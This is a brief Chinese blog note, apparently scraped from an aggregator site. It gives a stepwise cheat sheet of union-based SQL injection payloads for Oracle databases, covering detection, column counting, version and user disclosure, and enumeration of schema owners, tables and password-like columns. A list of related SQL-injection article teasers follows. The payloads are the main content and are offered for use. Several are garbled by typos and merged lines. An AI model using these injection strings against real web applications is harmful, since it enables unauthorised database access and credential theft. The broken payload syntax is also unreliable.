sql注入oracle(1)
sql注入oracle
1. 判断为oracle
and exist (select * from dual ) 或者and (selecr count(*) from user_tables)>0 --
2. 获取基本信息
(1) 获取字段数
order by N
(2) 获取数据库版本
and 1=2 union select 1,2,(select banner from sys.v_$version where rownum =1),4,5 from dual
(3)获取数据库连接名
and 1=2 union select 1,2,{select sys_context('userenv','current_user') from dual),4 from dual
(4)获取日志文件的绝对路径
and 1=2 union select 1,2,(select instance_name from v$instance) from dual
3. 猜测数据库名/表和列名
(1)数据库名
and 1=2 union select (select owner from all_tables where rownum =1) from dual
(2)依次爆出数据库名
and 1=2 union select (select owner from all_tables where rownum =1 and owner<>'sys') from dual
(3)爆出表名
and 1=2 union select (select table_name from user_tables where rownum =1 ) from dualand (select column_name from user_tab_columns where column_name like '%25pass%25')>0and 1=2 union select (select column_name from user_tab_columns where columns_name like '%25pass%25') from dual
(4)爆出字段名
and 1=2 union select (select column_name from user_tab_columns where table_name = 'bonus' and rownum =1 )from dual
(注意:表名要大写)
sql注入oracle(1)相关推荐
- [网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- [网络安全提高篇] 一〇四.网络渗透靶场Oracle+phpStudy本地搭建万字详解(SQL注入、XSS攻击、文件上传漏洞)
当您阅读到该篇文章时,作者已经将"网络安全自学篇"设置成了收费专栏,首先说声抱歉.感谢这一年来大家的阅读和陪伴,这100篇安全文章记录了自己从菜鸡到菜鸟的成长史,该部分知识也花了很 ...
- Oracle学习总结(6)—— SQL注入技术
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动.在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一. SQL注入基 ...
- oracle延时盲注如何防止,【原创】WEB安全第四章SQL注入篇21 oracle 延时注入
WEB安全第四章SQL注入篇21 oracle 延时注入 1.简介 DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制.首先,不能直接将该函数注入子查询中,因为O ...
- oracle防止sql注入proc,解密:Oracle怎么防SQL注入
昨天我们说了怎么绕过waf进行sql注入,今天我们继续这个话题,说说Oracle数据库本身在防sql注入方面做了哪些工作. Oracle从8i开始PL/SQL中涌现出了大量SQL注入漏洞,直至11.2 ...
- oracle 注入靶场,pick靶场-sql注入
甲.数字型注入 数字型注入一般提交值没有引号,所以直接在后面构造语句就可以了. 抓包查看 构造语句 提交后 该数据库表内容被爆出来了. 乙.字符型注入 首先我们要知道一点,字符串在数据库中提交是需要用 ...
- Oracle 存储过程 字符串拼接 SQL注入的问题
之前项目中写的一个大的存储过程 中间用到的SQL字符串拼接的方法 来完成业务的流程 类似SQL的动态拼接把 为什么要有用到这种形式 因为我这个存储过程里面要处理 至少三个系统的六种情况 所以使用拼接的 ...
- 云端应用SQL注入攻击
实验目的及要求: 完成VMware Workstations14平台安装,会应用相关操作: 完成Windows server2008R2操作系统及Kali Linux操作系统的安装: 掌握SQLmap ...
- dnslog 在 sql注入中的应用
目录 1.DNSLOG的原理 2.Dnslog在常见数据库中SQL注入的实战 1.MySQL 2.msSQL 3.postgreSQL 4.Oracle 3.总结 1.DNSLOG的原理 DNS的解析 ...
最新文章
- 深度强化学习的前景:帮助机器掌控复杂性
- Spark源码阅读03-Spark存储原理之序列化和压缩
- scanf_s()函数 (是Microsoft公司VS开发工具提供的一个功能相同的安全标准输入函数)
- tensorflow tf.device() (返回指定要用于新创建的操作的默认设备的上下文管理器)
- 变换上三角矩阵_关于马尔可夫矩阵的一些个人研究成果、思考过程及相关解释...
- 【数据结构与算法】大根堆和优先队列的Java实现
- 庞伟(为奥运冠军名字作诗)
- cmd查看所有数据库 db2_db2 cmd命令操作
- MySQL之级联删除、级联更新、级联置空
- Oracle DB_LINK如何使用
- GitHub上10个有趣的开源小游戏(附加在线演示)
- Java调用网易163邮箱,发送邮件
- 程序员文档写作能力(三)-如何处理好微信、邮件、开会时的话术
- 一些Camera相关概念整理
- thinkphp使用dompdf导出pdf(html转pdf)
- 【机器学习实战笔记】Logistic回归
- 2017.11.06 ~ 11.10 NOIP八连测滚粗记
- 手机如何制作gif?简单三步在线合成gif动图
- switch基础用法
- thx是什么意思_thx什么意思?